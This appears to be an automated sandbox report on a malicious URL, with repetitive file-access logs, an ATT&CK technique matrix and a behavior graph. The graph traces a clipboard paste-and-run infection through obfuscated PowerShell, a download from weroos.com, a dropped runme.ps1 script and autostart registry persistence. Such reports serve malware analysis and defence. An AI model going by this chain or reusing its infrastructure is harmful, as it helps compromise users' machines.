        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\_decimal.pyd VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\_ctypes.pyd VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Users\user\AppData\Local\Temp\tmp901iwbnd\pip.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Temp\PyEnv\python.exeQueries volume information: C:\Temp\PyEnv\python311.zip VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFF7F6904E5 CreateNamedPipeW,20_2_00007FFF7F6904E5
        Source: C:\Temp\PyEnv\python.exeCode function: 24_0_00007FF70C491680 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,24_0_00007FF70C491680
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068A45E4 PySys_Audit,PyEval_SaveThread,bind,PyEval_RestoreThread,_Py_NoneStruct,26_2_00007FF8068A45E4
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068A55F8 _PyArg_ParseTuple_SizeT,PyEval_SaveThread,listen,PyEval_RestoreThread,_Py_NoneStruct,26_2_00007FF8068A55F8

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Command and Scripting Interpreter        		4
        Browser Extensions        		12
        Process Injection        		3
        Masquerading        		OS Credential Dumping1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts3
        PowerShell        		11
        Registry Run Keys / Startup Folder        		11
        Registry Run Keys / Startup Folder        		21
        Virtualization/Sandbox Evasion        		LSASS Memory21
        Security Software Discovery        		Remote Desktop ProtocolData from Removable Media4
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        DLL Side-Loading        		1
        DLL Side-Loading        		12
        Process Injection        		Security Account Manager1
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive4
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Extra Window Memory Injection        		1
        Deobfuscate/Decode Files or Information        		NTDS21
        Virtualization/Sandbox Evasion        		Distributed Component Object ModelInput Capture5
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Obfuscated Files or Information        		LSA Secrets1
        Application Window Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Software Packing        		Cached Domain Credentials1
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Timestomp        		DCSync13
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Extra Window Memory Injection        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1710272 URL: http://flexjjet.com Startdate: 09/06/2025 Architecture: WINDOWS Score: 100 62 weroos.com 2->62 64 www.python.org 2->64 66 11 other IPs or domains 2->66 86 Malicious sample detected (through community Yara rule) 2->86 88 AI detected phishing page 2->88 90 Detect drive by download via clipboard copy & paste 2->90 92 4 other signatures 2->92 10 cmd.exe 1 2->10         started        13 chrome.exe 3 2->13         started        16 chrome.exe 2->16         started        signatures3 process4 dnsIp5 102 Suspicious powershell command line found 10->102 104 Obfuscated command line found 10->104 18 powershell.exe 15 10 10->18         started        23 conhost.exe 1 10->23         started        80 192.168.2.16, 443, 49705, 49706 unknown unknown 13->80 82 192.168.2.17 unknown unknown 13->82 84 192.168.2.24 unknown unknown 13->84 25 chrome.exe 13->25         started        signatures6 process7 dnsIp8 68 weroos.com 104.21.63.92 CLOUDFLARENETUS United States 18->68 50 C:\Users\user\AppData\Roaming\...\runme.ps1, ASCII 18->50 dropped 94 Suspicious powershell command line found 18->94 96 Creates autostart registry keys with suspicious values (likely registry only malware) 18->96 98 Bypasses PowerShell execution policy 18->98 100 3 other signatures 18->100 27 powershell.exe 49 18->27         started        70 links.duckduckgo.com 20.83.18.132 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 25->70 72 duckduckgo.com 40.89.244.232, 443, 49723, 49724 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 25->72 74 17 other IPs or domains 25->74 file9 signatures10 process11 dnsIp12 76 dualstack.c.ssl.global.fastly.net 151.101.0.175 FASTLYUS United States 27->76 78 dualstack.python.map.fastly.net 151.101.64.223 FASTLYUS United States 27->78 52 C:\Temp\PyEnv\winsound.pyd, PE32+ 27->52 dropped 54 C:\Temp\PyEnv\vcruntime140_1.dll, PE32+ 27->54 dropped 56 C:\Temp\PyEnv\vcruntime140.dll, PE32+ 27->56 dropped 58 28 other files (27 malicious) 27->58 dropped 106 Loading BitLocker PowerShell Module 27->106 32 python.exe 5 27->32         started        36 python.exe 1 27->36         started        38 conhost.exe 27->38         started        file13 signatures14 process15 dnsIp16 60 pypi.org 151.101.0.223 FASTLYUS United States 32->60 42 C:\Temp\PyEnv\Scripts\wheel.exe, PE32+ 32->42 dropped 44 C:\Temp\PyEnv\Scripts\pip3.exe, PE32+ 32->44 dropped 46 C:\Temp\PyEnv\Scripts\pip3.11.exe, PE32+ 32->46 dropped 48 393 other files (none is malicious) 32->48 dropped 40 cmd.exe 1 32->40         started        file17 process18

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.